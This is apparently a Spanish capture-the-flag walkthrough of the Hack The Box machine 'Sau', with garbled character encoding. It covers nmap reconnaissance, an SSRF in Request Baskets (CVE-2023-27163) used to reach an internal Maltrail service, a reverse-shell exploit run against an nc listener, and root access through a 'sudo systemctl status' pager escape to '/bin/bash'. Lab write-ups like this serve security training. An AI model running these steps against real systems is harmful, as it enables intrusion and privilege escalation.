# Sau
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 10.10.11.224
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sC -sV 10.10.11.224
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Durante el escaneo se identificaron los siguientes puertos abiertos:
* **Puerto 22 (SSH)**: El servicio SSH est谩 en ejecuci贸n con la versi贸n 8.2p1 de OpenSSH en un sistema Ubuntu. Esta versi贸n es relativamente moderna y es probable que est茅 actualizada, pero a煤n es importante revisar posibles vulnerabilidades espec铆ficas de esta versi贸n, como debilidades en la configuraci贸n del servicio o ataques de fuerza bruta si no se utiliza autenticaci贸n de clave p煤blica. El escaneo de las claves del host muestra RSA, ECDSA y ED25519, lo que sugiere que se est谩n utilizando claves modernas, lo que es una buena pr谩ctica.
* **Puerto 80 (HTTP)**: El puerto 80 est谩 filtrado, lo que significa que no hay respuesta directa en este puerto desde el escaneo. Podr铆a haber un firewall o una configuraci贸n de seguridad que bloquea el tr谩fico en este puerto, o simplemente podr铆a no estar activo.
* **Puerto 55555 (HTTP)**: Este puerto est谩 abierto y ejecuta un servidor HTTP construido con Golang, como indica la descripci贸n. El t铆tulo de la p谩gina es "Request Baskets" y la solicitud fue redirigida a `/web`, lo que indica que la aplicaci贸n web probablemente tenga rutas configuradas para manejar diferentes solicitudes.
A continuaci贸n, se proceder谩 a analizar cada uno de estos servicios en busca de posibles vectores de ataque.
### 馃攷 EXPLORACI脫N
Se utiliza el comando:
```bash
sudo nmap -sCV -p22,80,55555 -v 10.10.11.224
```
para que nos proporcione m谩s informaci贸n sobre esos puertos espec铆ficamente.
Reviso el puerto 55555.
Mirando la p谩gina nos sale la versi贸n por lo que buscamos si tiene un CVE para explotar.
Al realizar una b煤squeda en Google, se puede identificar que esta versi贸n es vulnerable a una falla de SSRF (Server Side Request Forgery), CVE-2023-27163, que afecta al componente de la API de Request Baskets, espec铆ficamente en el endpoint `/api/baskets/{name}`. Esta vulnerabilidad permite a los atacantes realizar solicitudes manipuladas a la API, lo que les da acceso a recursos internos de la red e informaci贸n sensible.
Enviamos la petici贸n como se nos indica.
Dado que esta versi贸n es vulnerable a SSRF y que el puerto 80 estaba filtrado, lo que nos imped铆a acceder a 茅l desde el exterior, modificaremos la configuraci贸n para redirigir las solicitudes GET hacia el propio localhost del servidor, espec铆ficamente al puerto 80. De esta forma, conseguiremos establecer una conexi贸n con los recursos internos del servidor.
### 馃殌 **EXPLOTACI脫N**
Recargamos de nuevo.
Miramos si la versi贸n de **Maltrail** tiene alguna vulnerabilidad por internet.
{% @github-files/github-code-block url="" %}
Ejecutamos mientras nos ponemos en escucha.
```bash
python3 exploit.py 10.10.14.14 4444 http://10.10.11.224:55555/6ywt1xx/
nc -lvnp 4444
```
### 馃攼 PRIVILEGIOS
Al estar dentro y ejecutar:
```bash
whoami
```
a煤n no somos **root**, por lo que hacemos:
```bash
sudo -l
```
para ver si hay algo para explotar.
{% embed url="" %}
```bash
sudo /usr/bin/systemctl status trail.service
!/bin/bash
```
